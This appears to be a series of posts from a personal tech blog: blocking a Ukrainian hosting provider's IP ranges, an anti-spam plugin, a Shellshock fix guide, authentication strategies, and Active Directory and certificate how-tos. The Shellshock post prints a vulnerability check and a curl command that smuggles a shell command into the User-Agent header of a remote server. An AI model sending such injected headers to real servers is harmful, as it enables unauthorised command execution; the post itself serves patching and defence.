Blocking all BlazingFast IP address blocks (ranges)

Over the past few weeks, I’ve had some issues with my site sometimes not being available or loading very slowly. Checking on the server I could see a high number of Apache processes and a memory usage about 5GB higher than usual. Issuing a netstat I could see that there were many connections from the same IP address:

A whois on this address shows that this IP address belongs to a hosting company in Kiev, Ukraine called BlazingFast. I first blocked this IP address using iptables:

/sbin/iptables -A INPUT -s  -j DROP

Since I have a monitoring script checking intrusion attempts and blocking IP addresses, I end up having lots of DROP rules in iptables. So once a week I clean them automatically. Usually hackers do not spend more than a week trying if they see that their traffic to my server is blocked anyway.

Here it was different. As soon as the rules where cleared, it started again with the exact same address. Of course, I immediately blocked this IP address again and sent an email to their abuse email address. But as expected never got an answer. Instead, the same thing happened again but coming from another similar IP address: Whois shows that this address also belongs to the same Ukrainian hosting company.

So, since it was now clear that I’ll keep having problems with IP addresses belonging to this company, I decided to block all traffic coming for the IP ranges owned by them. First I checked what was their ASN on AS60033. Then looked up their IP address blocks on

Then all I had to do is use iptables to block traffic from these IP address blocks (and make sure that these rules stay in there):

/sbin/iptables -A INPUT -s -j DROP
/sbin/iptables -A INPUT -s -j DROP
/sbin/iptables -A INPUT -s -j DROP
/sbin/iptables -A INPUT -s -j DROP
/sbin/iptables -A INPUT -s -j DROP
/sbin/iptables -A INPUT -s -j DROP
/sbin/iptables -A INPUT -s -j DROP
/sbin/iptables -A INPUT -s -j DROP
/sbin/iptables -A INPUT -s -j DROP
/sbin/iptables -A INPUT -s -j DROP
/sbin/iptables -A INPUT -s -j DROP
/sbin/iptables -A INPUT -s -j DROP
/sbin/iptables -A INPUT -s -j DROP
/sbin/iptables -A INPUT -s -j DROP
/sbin/iptables -A INPUT -s -j DROP
/sbin/iptables -A INPUT -s -j DROP
/sbin/iptables -A INPUT -s -j DROP
/sbin/iptables -A INPUT -s -j DROP

So now the load on the server is fine again and unlike the past few weeks the hosted websites are always accessible and load fast.

It’s interesting to see that BlazingFast is advertizing with the DDOS protection service on hand and actually seem to have customers performing brute force attacks from their servers on the other. If you look up their ASN on the fail2ban reporting service, you will see that a few of their IP addresses are being blocked. So I am not the only one who’s been hit by this. Maybe they should not only focus on protecting their customers from DDOS attacks but should also prevent them from performing attacks.

This post on stackexchange also shows that it’s not something new but it looks like there were already attacks originating from one of their IP addresses in May. The answers to this post will also give you some alternative solutions to block them using the Apache .htaccess file, the Cisco firewall, Nginx, a Microsoft IIS Web Server rule, netsh ADVFirewall or CSF firewall.

I know it’s more difficult to identify attacks originating from one of your IP addresses than attacks targeting your network. As a hosting company, you definitely do not want to have to many false positive and block legitimate traffic created by your customers. But I’m still pretty mad having to waste so much time taking care of this kind of things…

Update 18/07/2015: I’ve ended up also blocking all IP blocks of the following companies: ISPsystem, cjsc and Lekosport-Kharkov LLC which were wasting my time and there’s trying to hack wp-login.php.

Update 20/07/2015: Today I’ve blocked additional IP blocks belonging to Kyivstar PJSC. Slowly I’m starting to think that I’ll have to block access to complete regions in order to be able to sleep at night without worrying…

WordPress Spam Fighting

Until September 2014, I was mostly relying on Akismet to prevent comment spam on my blog. But some time last summer, I noticed that there were actually quite a few spam comments which weren’t identified as such. The reason for this was that the total number of spam comments reached about 1000 a day. So of course having a few of them slip through every day wasn’t actually much. But it was still a pain to go through them as I was only checking comments once in a while.

So I decided to find out what for methods I could use to prevent comment spam and not only rely on Akismet. This led me to write a plugin called WP Spam Fighter.

In this plugin, I’ve implemented a few methods designed to address different vectors used to create comment spam.

Spam Bots vs. Normal Users

First, most comment spam is not generated by humans but by bots just creating comments on thousands of sites. It makes it easier to trick them, since they are not designed to workaround all possible tricks used to identify them but to create as many comments as possible on as many sites as possible.

So how do you identify Spam bots ?

Well, first you have to understand how to identify a normal user:

  1. A normal user sees a rendered web page and not only the HTML code.
  2. A normal user actually reads your posts.
  3. A normal user also understands the fields contained in a comment form.

You should also note that the second characteristic of normal users also differentiate them from human spammers. Human spammers do see a rendered site and do understand the comment form fields but do not actually read your post.

Ok, so now we know how to identify a normal user, how do we use this knowledge to stop comment spam ?

A normal user sees a rendered web page

This basically means that a normal users will only fill in form fields which are actually visible on the rendered page. Spam Bots will fetch the HTML code and will not apply any CSS styles. So if you add a field in the form and make it invisible, normal users will not fill it but Spam bots might.

This leads us to a spam fighting method usually called a honeypot-based mechanism. Spam bots will usually go through all fields in the form and try to put in some value (since they do not know which fields are mandatory fields and which ones are optional).

The more the additional fields looks like a normal form fields the better the chances that even a half-intelligent Spam bot will not identify it as a honeypot.

A normal user actually reads your posts

Spam bots as well as human spammer actually do not care about the contents of your post. There is almost no targetted Spam which makes sure that the spam comments are added to a post which is actually really related to their comment. So even human spammers will just scroll down to the bottom of the post and enter some text in the form fields. Their goal is to produce as much spam as possible in the shortest period of time. So the chances are that they will try to spend as little time as possible on your page.

So a way to fight both human spammers and spam bots is to make sure that a comment can only be posted after the user has spent a certain amount of time on your page. How long this is basically depends on the type of content you have on your page. If you just post short jokes, it could be that a legitimate user posts a smiley as comment after only 20 seconds on your page. If you have long and complex articles on your site, the chances are that nobody will comment on your posts without spending at least a minute on the page.

This spam protection mechanism can be implemented by adding some JavaScript code which will return an error message when you try to submit a comment to early. Of course anything which resides purely on the client side is out of your control, so it can be circumvented by a spammer. That’s why you need to also have a check in the backend making sure that the JavaScript check has run (i.e. by adding data to the form before posting it).

A normal user also understands the fields contained in a comment form

Of course a human spammer also does. So developping a spam protection mechanism based on this will only help against spam bots not specifically targetting your site.

This just involves adding a form field and expecting a given value. It’s simplest form is having a checkbox labelled “I am NOT a spammer”. The most complex form is having some kind of captcha. Since I hate captchas, I’ve only implemented the simple checkbox option in my plugin. It’s not much additional work for a legitimate user and will still block stupid spam bots.

Additionally to this (or as an alternative), you can also implement a second similar mechanism involving automatically adding some kind of token to the form field using JavaScript (when the form is submitted). In the backend you then check the presence of this token. Spam bots ususally do not run JavaScript code on your page, so they will submit the form without this token.

Additional ways to identify legitimate users

If you want to make 100% sure that you do not get comment spam, there are a few additional methods you can use to prevent spam:

  1. Check whether a gravatar is associated with the provided email address
  2. Only allow registered users to comment
  3. Completely disable commenting

Of course, for a blog, I wouldn’t recommend disabling commenting as comments are often a valuable input both for you and for your visitors. Also many spam fighting mechanisms also make life more difficult for legitimate visitors who want to comment on a page. I personally hate Captchas and every time I get a captcha wrong on first entry or get a text I need to enter which I can hardly read, I just move away.

So forcing users to have a gravatar or registering in order to comment, could reduce the number of visitors who will actually take the time to post a comment.


Many of the mechanisms presented in this article are fairly simple and not at all bullet-proof. A human spammer would be able to workaround them all and it would also be possible to create a spam bot being able to work around them. What you need to keep in mind is:

  • Spam is usually not targetted. The spam comments you get are posted on millions of sites.
  • The goal of spammers is to get through with least effort.

This basically means that even though a spammer might implement a bot to workaround these mechanisms, why should he waste his time ? There are millions of sites out there and you are only one of them. Even spending an hour implementing a way to workaround you spam protection would be a waste of time.

So, of course, a human spammer could wait for 30 seconds before posting a comment on your site. But instead of spending 5 minutes posting 10 spam comments on your site, it’d make more sense to post 30 spam comments on another sites which doesn’t have this kind of protection.

On this site, I’ve configure the WP Spam Fighter plugin to enable the following mechanisms:

  • Time based protection
  • Honeypot protection
  • “Not a spammer” checkbox
  • JavaScript human check

And the results are not bad. After switching to this plugin from Akismet, the number of spam comments which went through reduced from 1 or 2 a day to 1 or 2 spam comments a month. Since I still do get a spam comment every 5 minutes (which is automatically marked as Spam by the plugin) and I only check the spam comment folder once in a while, it’s difficult to say whether there are any false positives. But there should actually not be any, since none of these mechanisms interpret comment data to identify spam. Moreover the number of comments I get on the site didn’t change after introducing this plugin.

And the great advantage versus Akismet is that this plugin doesn’t need to store or transmit any data related to the visitors of this site, which can be a problem in some countries.

Windows 7: empty pages displayed in CHM file

When opening a CHM file downloaded from Internet on a Windows Vista or Windows 7 machine, the file may not render properly and just show empty pages. All you’ll see no matter which page you select is an error message saying that “Navigation to the webpage was canceled” e.g.:

Navigation to the webpage was canceled

The problem is that the file comes from another computer and is blocked. It’s strange because you actually get a security warning when opening the file and one would expect that if you open it anyway, everything should be fine. Here an example of such a security warning:

Open File - Security Warning

The solution is to unblock the file. In order to do it, do not open the file directly from the browser but save it to disk, then right click on the file, choose Properties and unblock the file:

CHM file properties - Unblock

Now, when you open the file, no security warning will be displayed and the contents will be displayed properly.

Note that you should only unblock files that you trust.

If you do not see an Unblock button, you have either already unblocked it and it doesn’t work anymore (not exactly sure when this happens) or you might have stored the file on a file system which doesn’t support the Unblock feature (not sure but it looks like it only works on NTFS).

You can also implicitly unblock the file by unchecking “Always ask before opening this file” in the security warning shown above.

So this whole behavior seems not to be very consistent but fixing it was pretty straight forward.

Update: It looks like on Windows 8, you can unblock files from a PowerShell using the following commandlet:

Unblock-File .\SshNet.Help.chm


Fixing the Shellshock GNU bash shell vulnerability

What’s shellshock?

Shellshock (also known as Bashdoor) is a vulnerability in GNU bash shell. It allows an attacker access to run remote commands on your system. It seems to affect the Bash versions 1.13 to 4.3. In the past few days, botnets have used compromised computers for distributed denial-of-service (DDOS) attacks and vulnerability scanning. Bash is installed as the default command line interface on many Unix-based systems. It is used to interpret commands and is itself a command which can be executed. As such it has both a list of environment variable and a list of internal functions. When launching a new bash interpreter, a new list of environment variables and functions can be exported to the new process. This vulnerability causes Bash to execute commands stored in environment variables in a special way. This happens when a newly started instance of Bash scans its environment variables for values in a special format, which should be converted to internal functions. In the affected versions, Bash creates fragments of code on-the-fly and executes them without checking whether the fragments are only function definitions. Using this vulnerability, the attacker can execute any arbitrary command.

How to check whether you are affected?

In order to check whether your system is affected you can execute the following from a shell:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

If the ouput contains “vulnerable”, you are affected. Otherwise, it means the patch for Bash has already been installed (but keep in mind that there different ways to exploit this vulnerability and even if this check is negative, it’d be safe to update to newer versions of Bash as they are released).

Your server is not only vulnerable when spawning a Bash instance from the command line but also when Apache is used in combination with mod_cgi and spawns either a Bash shell or anything else (e.g. a Perl script) which executes commands and passes environment variables.

A few examples are:

  • A Perl script using the built-in functions exec or system to invoke a new shell process
  • A PHP script using the built-in functions exec or system to invoke a new shell process
  • A Python script using os.system or os.popenx (depending on how it is called)

Note that an attack on CGI scripts will only work if Bash is used as default shell.

Just to show you how easy it is to use this vulnerability against a server running Apache, mod_cgi and some CGI scripts spawning a shell:

curl "" --insecure -H "User-Agent: () { :; }; echo 'Hello Server' > /tmp/shellshock.log"

This will return some HTML code and will create a file /tmp/shellshock.log on the affected server.

How to fix it?

In most systems, it’s as easy as installing the latest Bash update. On Debian, Ubuntu and other systems using apt-get:

apt-get update && apt-get upgrade

On Red Hat, Fedory, CentOS and other systems using yum:

yum -y update bash

On Arch Linux:

pacman -Syu


zypper ref -s
zypper up bash

SUSE Linux Enterprise Server

Note that updatse for SLES are only available in LTSS versions and for SLES 11 SP3. If you are running an older non-LTSS version of SLES, you’ll have to install Bash from source as described below. Here the list of SLES versions for which an update is available:

  • SUSE Linux Enterprise Server 10 SP3 LTSS
  • SUSE Linux Enterprise Server 11 SP2 LTSS
  • SUSE Linux Enterprise Server 11 SP1 LTSS
  • SUSE Linux Enterprise Server 10 SP4 LTSS
  • SUSE Linux Enterprise Server 11 SP3

Red Hat Enterprise Linux

RHEL updates are available for the following versions:

  • Red Hat Enterprise Linux 4 Extended Lifecycle Support
  • Red Hat Enterprise Linux 5
  • Red Hat Enterprise Linux 5.6 Long Life
  • Red Hat Enterprise Linux 5.9 Extended Update Support
  • Red Hat Enterprise Linux 6
  • Red Hat Enterprise Linux 6.2 Advanced Update Support
  • Red Hat Enterprise Linux 6.4 Extended Update Support
  • Red Hat Enterprise Linux 7

 Mac OS X

Apple has released updates for Mac OS X Lion, Mountain Lion and Mavericks. Make sure that you install these updates even if Apple has been arguing that most Mac OS X users are not exposed unless they have configured advanced UNIX services. Since most Max OS X users do not have a web server running, the risk of having this vulnerability exploited is not as high as for Unix-based web servers accessible from the internet but you do not want to risk anything especially when the fix is as easy as updating your software (which should be done on a regular basis anyway).

How to install from source?

Latest Bash version (4.3)

If no update is available for your system (e.g. because you’re on an older version), you’ll have to download Bash 4.3, apply all patches, compile it and install it. If you have a direct access from your machine to the internet, do the following:

cd /tmp
mkdir bash
cd bash
for i in $(seq -f "%03g" 1 27); do wget$i; done
tar zxvf bash-4.3.tar.gz 
cd bash-4.3
for i in $(seq -f "%03g" 1 27);do patch -p0 < ../bash43-$i; done
./configure && make && make install

If there are more than 27 patches for Bash 4.3 when you read this replace both occurences of 27 by the appropriate number.

If you do not have direct access to the internet from the machine, you’ll have to download Bash 4.3 and all updates and then copy them through (S)FTP to /tmp/bash:

tar zxvf bash-4.3.tar.gz 
cd bash-4.3
for i in $(seq -f "%03g" 1 27);do patch -p0 < ../bash43-$i; done
./configure && make && make install

Note: If the files are renamed to bash43-0xx.txt when downloading, you’ll have to remove the .txt extension. And change 27 to the current number of patches for Bash 4.3.

Also note that bash will be installed in /usr/local/bin/bash. you will then need to make sure that the old bash is removed and replaced by a symlink to the new one:

cd /bin; rm bash; ln -s /usr/local/bin/bash

(thanks Gerhard for the hint)

Older Bash version (e.g. 3.2)

If you’re using an older version of Bash (e.g. because you’re running SLES 11 SP1), you might want to only update Bash to the latest update within the same version.

First create the working directory /tmp/bash using: mkdir /tmp/bash

Download instead of the 4.3 package. This package already includes the updates until update 48. Additionally download updates 49 to 54 from

Note: If the files are renamed to bash32-0xx.txt when downloading, you’ll have to remove the .txt extension.

Upload all downloaded files to /tmp/bash. Go to /tmp/bash using: cd /tmp/bash and execute the following:

tar zxvf bash-3.2.48.tar.gz 
cd bash-3.2.48/
for i in $(seq -f "%03g" 49 54);do patch -p0 < ../bash32-$i; done
./configure && make && make install

Change 54 to the current number of patches for Bash 3.2.

Also note that this uses the patch command. If it is not installed, you’ll have to install it or you’ll have to perform all steps except the last one on a machine where patch is installed and then copy the resulting folder to the machine where it should be installed before executing the last command. Before executing this last command you might need to add execution permissions to the configure file:

chmod +x configure

If you get the following error message during the install step:

/home/install -m 0755 bash /usr/local/bin/bash
make: execvp: /home/install: Permission denied
make: *** [install] Error 127

You will have to execute the following:

install -m 0755 bash /usr/local/bin/bash

Note that bash will be installed in /usr/local/bin/bash. you will then need to make sure that the old bash is removed and replaced by a symlink to the new one:

cd /bin; rm bash; ln -s /usr/local/bin/bash

(thanks Gerhard for the hint)


I’ve noticed that with the new version of Bash there may be some issues when setting LD_LIBRARY_PATH  before starting some software. Actually you should not be using LD_LIBRARY_PATH on a production system but rather rely on ldconfig. In order to do this, you should add all directories containing shared libraries to /etc/ and execute the following:

ldconfig -v

This way you make sure that even with an updated version of Bash your software will find the shared libraries without issues.


Authentication Strategies


Authentication is the process of checking the identity of a person. There are many different ways to do it both the digital and analog world. All these possibilities rely on some knowledge about the person itself. This is of course a recursive problem since the validity of this knowledge is very often based on information gathered by a system or a person who itself needs to be authenticated. But unless you want to end up with an egg or chicken dilemma, at some point you’ll need to define some way to define the root assumption which you need to consider true in order to base a chain of authentication on it.


In a computer system, the most obvious way to handle it is to use a password to authenticate a user and make sure that the user is properly identified during the creation process of this password. Additionally, you need to ensure that the password cannot be guessed by a third-party (or it is prohibitively complex to guess it) and that the password is in a storage which is itself safe (e.g. only in the memory of the user herself).

Meanwhile, in a world where most persons need to be authenticated in multiple places and systems on a daily or hourly basis, it has become obvious that an approach solely based on passwords and the hope that these passwords are safely stored is not sufficient to ensure safe authentication. First, a password is not only stored in the memory of its owner but also in every system which can receive it to authenticate a user (of course passwords shouldn’t be stored in a form which allows a third-party to directly read it but even encoding it with a one-way encryption mechanism doesn’t mean someone will not be able to find it out). Moreover, since a single persons needs to authenticate in many different systems, users then to use the same password in multiple systems, once a single system is compromised, authentication of these users is compromised in many other systems.

In the past, a kind of solution to this problem has been to use a password store. For each system needing to authenticate you, a unique password is generated. This password is usually a very strong password. Since this kind of passwords are more difficult to remember, it’s not the person itself who will remember it but a password store will store it and provide it on demand. Of course, this only moves the problem to another location. Now you don’t have a problem anymore with weak passwords or password reuse, but have a problem protecting the password store and making sure that only the person who’s owning the passwords can access them. This is again an authentication problem and is usually solve by using a password to secure the password store. Back to square one…


Apart from using passwords, there are many other options for identifying a user. Some of them are used instead of a password authentication. Others in addition to it, implementing a two-factors authentication. The logic behind it is that even if two authentication mechanisms are not strong enough by themselves, the combination of the two mechanisms makes it exponentially more difficult to hack the authentication mechanism. Of course, this only works if the two mechanisms are based on two completely different concepts making it difficult to circumvent them both.


Some authentication mechanisms rely on special knowledge unique to the person being identified. Once the person has been authenticated for the first time (whether using registration or personal identification on site), the system needs to gain some information, that is known only to this person. This is most easily done by gathering some facts about the person and her life. Only one piece of information is definitely not enough but a combination of them can allow to prevent most people from guessing their way through the authentication process. The problem with this is that there is still usually a circle of people who know the person to be authenticated well enough that they could actually have the same knowledge. This is then on one side a matter of reducing this circle to the minimum and on the other side of seeing whether the persons in this circle can be trusted.

In summary, although the effort required to implement such a mechanism is relatively low, it does not provide much of a security level. This is the reason why this kind of mechanism is usually not used for main authentication purposes but rather for side-processes like resetting a password. Even if someone guesses the name of your best friend in primary school, all they would achieve is to have an email sent to you and would still need to hack your email account in order to be able to use it.


What’s more unique to a person that her own body ? That’s the reason why a wide range of biometric authentication mechanism have been implemented. It encompasses fingerprints, facial recognition, retina recognition, voice recognition, hand/palm geometry and more. Fingerprint authorization is most used biometric mechanism. The reason is that a fingerprint is small enough that it can be read on a smartphone, a mouse, a keyboard, an external hard drive, a flash drive or other smaller reading devices and easy to access. Also units to read fingerprints are relatively cheap.

This kind of authentication has been widely advertized by spy movies. A few decades ago, the technology for using it was still too expensive to be able to use it in a mass market. But with lower costs, we start seeing more widely available system using this type of authentication.

 Security tokens

The idea behind security tokens is that instead of identifying a person, you can identify a device you know only the person to be authenticated has access to. This security token can be anything which can be uniquely identified and is difficult (or ideally impossible) to forge. Since making devices which cannot be forged is virtually impossible and making devices which are very difficult to forge is expensive, this kind of authentication is best used in combination with another mechanism, e.g. by storing information on the security token which can only be read when using some other authentication mechanism like a PIN or a password.

An example of such a security token is a smart card. They are cheap, small in size and a widely used authentication mechanism. Using them requires a card reading device. This additional requirement makes them unsuitable for authentication on some platforms. Reading the card can be done either through contact with electrical connectivity pads (for contact smart cards) or through RF induction (for contactless smart cards).

Very often smart cards are combined with a digital certificates infrastructure base on a public key infrastructure (PKI). See below for more information on digital certificates.

Some USB devices can also be used for authentication purposes. They are basically very similar to smart cards. They contain some authentication information which is transmitted to the computer through a USB port. They share the same issue as smart cards (not being usable in all environments) but bring the additional problem that they are not as easy to fit in your pocket/wallet as smart cards. An alternative to USB devices are Bluetooth devices (or Bluetooth enabled USB devices) which do not require a USB port and are thus usable on a wider range of devices.

Another example is a disconnected token displaying some generated authentication data which can be entered by its owner into another system. The generation pattern for the data displayed by these devices should be such that it is almost impossible to figure it out and guess the next generated data.

Of course, now that a large portion of the population in many markets has a smartphone in their pocket, solutions turning your smartphone (or tablet computer) into a security token seem to be a good solution. This doesn’t require you to carry around an additional device which serves no other purpose than authentication.

One-time security tokens

These are security items which are created for a one-time used. Once they have been used, they are not valid anymore and another has to be used for the next authentication. Since they are valid only for a single use, if one of them is compromised, the negative impact can be limited. When using such an authentication mechanism, it is very important to secure the delivery of these tokens to your users. If the delivery mechanism itself is compromised, this mechanism itself will not provide you more security than using multiple-uses security items.

An example of this are one-time passwords generated on demand and sent to your email account (possibly in an encrypted email). Or a list of indexed one-time passwords as used for online banking.

One-time security tokens can also be images or messages transported through alternative mechanisms e.g. to your cell phone or other devices.

Digital certificates

Digital certificates are digital identifying information usually containing some additional information, like serial numbers, expiration dates, public keys and are digitally signed by a trusted certificate (which allows the creation of an authentication chain). The root certificates (certificates at the root of an authentication chain) are usually distributed in operating systems, browsers and other system which source are secured.

 Additional checks

Additionally to all these different types of authentication, you can also combine an authentication mechanism with some mechanism which checks the probability of the authentication. It can be done by checking some facts about the context of the authentication e.g. geolocation, IP address used, date/time (e.g. whether the user has already checked out from work or is on vacation)…

Also making the system only available in a secured environment also works as a two-factor login. You can e.g. only allow access to a system using a VPN connection and not directly over the internet. You are thus checking that the user can connect through VPN and also her password. Of course, if the authentication required to access the login page is the same as the one then used on the login page, this won’t increase the security of your application. Even if this kind of checks are not used to reject authentication but only to detect a potential breach and have it checked, it is already very useful as it limits the impact of a breach.

A few last words

Authentication is not only limited to validating passwords. There is a wide range of possibilities to verifying the identity of a person. Some of them have existed for a very long time (like checking a passport or an ID). Some of them have been around for some time too but are now becoming accessible to the wider masses (e.g. biometric mechanisms). Authenticating oneself is not something people usually enjoy especially when it has to be done many times a day. This is the reason why single sign-on has become to popular and so important. But one has to keep in mind that reusing an authentication done by a third party is a matter of trust. If the security level of this third party is not sufficient, you’re opening your system/application for security breaches.

Authentication is always based on some assumptions as to which data can securely be used to identify a person. But these assumptions are only as good as the measures in place to ensure the validity and security of these data. Checking something delivered to a person is only safe if it cannot be guessed and if the delivery to the person is also secure.

Using a combination of unrelated authentication mechanisms is always safer than relying on only one of them. How good the combination is depends on how different they are. Checking two different passwords stored in the system might not provide more security. But checking a fingerprint and a digital certificate will provide a pretty strong security mechanism.

This article does address a few authentication mechanism which probably cover a large part of what’s being used out there. But there are many more mechanism, some of them might prove to be better alternatives in the future. Also some of the mechanisms discussed here, might seem secure with our present knowledge but prove insecure in the future. The only way to keep providing a secure authentication of your users is to stay informed, learn about the weaknesses of existing authentication means and evaluate new authentication mechanisms.

C#: Query active directory to get a user’s roles

There are a few different ways to get the roles/groups of user from Active Directory. Here are 3 different ways to do it.

The first way to do it is to use UserPrincipal.FindByIdentity:

private static IEnumerable<string> GetGroupsFindByIdentity(string username, string domainname, string container)
	var results = new List<string>();
	using (var context = new PrincipalContext(ContextType.Domain, domainname, container))
			UserPrincipal p = UserPrincipal.FindByIdentity(context, IdentityType.SamAccountName, username);
			if (p != null)
				var groups = p.GetGroups();
				foreach (var group in groups)
					catch (Exception ex)
		catch (Exception ex)
			throw new ApplicationException("Unable to query Active Directory.", ex);

	return results;

You can then print the roles using:

var groups = GetGroupsFindByIdentity("benohead", "", "DC=aw001,DC=amazingweb,DC=de");
foreach (var group in groups)

Another way to do it is to use a DirectorySearcher and fetching DirectoryEntries:

private static IEnumerable<string> GetGroupsDirectorySearcher(string username, string container)
	var searcher =
		new DirectorySearcher(new DirectoryEntry("LDAP://" + container))
			Filter = String.Format("(&(objectClass=user)(samaccountname={0}))", username)

	var directoryEntriesFound = searcher.FindAll()
		.Select(result => result.GetDirectoryEntry());

	foreach (DirectoryEntry entry in directoryEntriesFound)
		foreach (object obj in ((object[]) entry.Properties["MemberOf"].Value))
			string group = Regex.Replace(obj.ToString(), @"^CN=(.*?)(?<!\\),.*", "$1");
			yield return group;

The regular expression is required in order to extract the CN part of the returned string.

var groups = GetGroupsDirectorySearcher("benohead", "DC=aw005,DC=amazingweb,DC=de");
foreach (var group in groups)

The third way to do it is to use a WindowsIdentity:

private static IEnumerable<string> GetGroupsWindowsIdentity(string userName)
	var results = new List<string>();
	var wi = new WindowsIdentity(userName);

	if (wi.Groups != null)
		foreach (var group in wi.Groups)
				results.Add(@group.Translate(typeof (NTAccount)).ToString());
			catch (Exception ex)
				throw new ApplicationException("Unable to query Active Directory.", ex);
	return results;

You can then print the roles using:

var groups = GetGroupsWindowsIdentity("benohead");
foreach (var group in groups)

You might notice that this last option seems to return more groups than the other two options. I’m not yet sure why. I’ve tested it with multiple users and saw that it does return different groups but for some reason, it also returns groups not returned by any other method. So for now I’ll rather stick to the first or second method.

Java: Importing a .cer certificate into a java keystore

First let’s have a short look at what those certificates are and what you need them for. A certificate is basically a public key together with some additional identification information (e.g. country, location, company…). The certificate is signed by a Certificate Authority (CA) which guarantees that the information attached to the certificate are true. The .cer files are files containing a certificate.

Additionally to the certificate, you also need a private key. The receiver of the certificate will use the public key in the certificate to decipher the encrypted text sent you are sending. You will encrypt the text using the corresponding private key. The public key in the certificate is publicly available. But you are the only one having access to the private key (that’s why the keystore containing your private key is protected by a password). This allows everybody to check whether sent information really comes from you.

While developing your software you will most probably be working with self-generated certificates. These certificates do not allow the client application to check whether you are really who you say are but they allow you to test most certificate related functionality. You can generate such a certificate like this:

$JAVA_HOME/bin/keytool -genkey -alias ws_client -keyalg RSA -keysize 2048 -keypass YOUR_KEY_PASSWORD \
         -keystore PATH_TO_KEYSTORE/ws_client.keystore \
         -storepass YOUR_KEYSTORE_PASSWORD -dname "cn=YOUR_FQDN_OR_IP, ou=YOUR_ORG_UNIT, o=YOUR_COMPANY, c=DE" \
         -validity 3650 -J-Xmx256m

Note that the backslashes you see in there are only required so that this command is recognized as a multiline command. If you write it all on one line, you won’t need them.

The certificate generated above is valid for almost 10 years (3650 days).

The -J parameter is just in there so that you do not get such an error invoking keytool:

Error occurred during initialization of VM
Could not reserve enough space for object heap
Could not create the Java virtual machine.

Now, when you go into production, you’ll want to have a “real” certificate so that your users do not get more or less scary messages saying that your identity cannot be verified (i.e. has not been created by a trusted certificate authority). You’ll have to buy such a certificate or have your customer generate one if they can.

This is how you can display the certificates currently installed in your keystore:

$JAVA_HOME/bin/keytool -list \
         -keystore PATH_TO_KEYSTORE/ws_client.keystore \
         -storepass YOUR_KEYSTORE_PASSWORD -J-Xmx256m

It will return something like:

Keystore type: JKS
Keystore provider: SUN

Your keystore contains 1 entry

ws_client, Apr 9, 2014, PrivateKeyEntry,

Certificate fingerprint (MD5): 4A:B5:07:64:A3:FF:16:E4:B9:28:A3:D9:BE:9D:7D:E6

You can export this certificate like this:

$JAVA_HOME/bin/keytool -exportcert -rfc -alias ws_client -file CER_FILE_PATH \
         -keystore PATH_TO_KEYSTORE/ws_client.keystore \
         -storepass YOUR_KEYSTORE_PASSWORD -J-Xmx256m

The rfc option means that the certificate will not be exported in binary form but as shown below.

The exported file looks like this:


In order to do get a certificate, you’ll have to provide the certifying authorities of the customer with a certificate request. This can be done using the keytool command like this:

$JAVA_HOME/bin/keytool -certreq -alias ws_client -file CSR_FILE_PATH -keypass YOUR_KEY_PASSWORD \
         -keystore PATH_TO_KEYSTORE/ws_client.keystore \
         -storepass YOUR_KEYSTORE_PASSWORD -J-Xmx256m

The certificate request file looks like this:


This certificate request file can then be sent to the person providing the certificate. Using this certificate request, he/she will generate a certificate which can then be imported this way:

$JAVA_HOME/bin/keytool -importcert -alias ws_client -file CER_FILE_PATH \
         -keystore PATH_TO_KEYSTORE/ws_client.keystore \
         -storepass YOUR_KEYSTORE_PASSWORD -J-Xmx256m 

You will need to answer y when prompted whether you trust this certificate:

Owner:, OU=Blog, O=amazingweb GmbH, C=DE
Issuer:, OU=HenriCA, O=amazingweb GmbH, C=DE
Serial number: 534565a5
Valid from: Wed Apr 09 17:22:13 CEST 2014 until: Sat Apr 06 17:22:13 CEST 2024
Certificate fingerprints:
         MD5:  4A:B5:07:64:A3:FF:16:E4:B9:28:A3:D9:BE:9D:7D:E6
         SHA1: 69:C5:C9:9D:08:AE:17:37:2E:58:F6:77:C9:7B:59:59:E3:29:49:74
         Signature algorithm name: SHA1withRSA
         Version: 3
Trust this certificate? [no]:  yes
Certificate was added to keystore

Note that whether you use a self-generated certificate or one generated by a trusted CA, you will need to reference the keystore file and provide the keystore password in the configuration of your servlet container or application server (e.g. in jbossweb.sar/server.xml for JBoss).

Generating new certificate in XAMPP for Windows

Since I had an older version of XAMPP for Windows installed, it was still using openssl 1.0.1e in which the heartbleed vulnerability was not yet fixed. So I installed the latest version and since the certificate in there was from 2013 I was not really sure whether it was safe or not so I decided to generate a new one. Here’s a short description how to do it.

Open a DOS prompt and navigate to the apache\bin directory in your XAMPP for Windows installation:

cd /D D:\Software\xampp\apache\bin

We’ll first define a couple of environment variables so that we do not need to provide them every time as parameter to openssl:

set OPENSSL_CONF=D:\Software\xampp\apache\conf\openssl.cnf
set RANDFILE=C:\Temp\.rnd

Now we’re ready to start. Generating a certificate involves 3 steps:

  1. Generating an RSA private key
  2. Generating a certificate sign request
  3. Generating a certificate

Note that since we are generating a self sign certificate, we can combine these 3 steps into 1 as described here.

Once the certificate is generated you can install it as shown here.

Generating an RSA private key

You can generate the key by executing the following:

D:\Software\xampp\apache\bin>openssl genrsa -out server.key 1024
Loading 'screen' into random state - done
Generating RSA private key, 1024 bit long modulus
e is 65537 (0x10001)

This will create a file called server.key with a content similar to:


Note you can find instructions saying to use the -des3 option. Do not this will cause your key to contain a pass phrase:

D:\Software\xampp\apache\bin>openssl genrsa -des3 -out server.key 1024
Loading 'screen' into random state - done
Generating RSA private key, 1024 bit long modulus
e is 65537 (0x10001)
Enter pass phrase for server.key:
Verifying - Enter pass phrase for server.key:

Which will lead to such an error loading the key from XAMPP:

[Wed May 07 14:32:03.746107 2014] [ssl:emerg] [pid 4564:tid 252] AH02577: Init: SSLPassPhraseDialog builtin is not supported on Win32 (key file D:/Software/xampp/apache/conf/ssl.key/server.key)
[Wed May 07 14:32:03.746107 2014] [ssl:emerg] [pid 4564:tid 252] AH02311: Fatal error initialising mod_ssl, exiting. See D:/Software/xampp/apache/logs/error.log for more information
[Wed May 07 14:32:03.746107 2014] [ssl:emerg] [pid 4564:tid 252] AH02564: Failed to configure encrypted (?) private key localhost:8443:0, check D:/Software/xampp/apache/conf/ssl.key/server.key
[Wed May 07 14:32:03.746107 2014] [ssl:emerg] [pid 4564:tid 252] SSL Library Error: error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong tag
[Wed May 07 14:32:03.746107 2014] [ssl:emerg] [pid 4564:tid 252] SSL Library Error: error:0D08303A:asn1 encoding routines:ASN1_TEMPLATE_NOEXP_D2I:nested asn1 error
[Wed May 07 14:32:03.746107 2014] [ssl:emerg] [pid 4564:tid 252] SSL Library Error: error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong tag
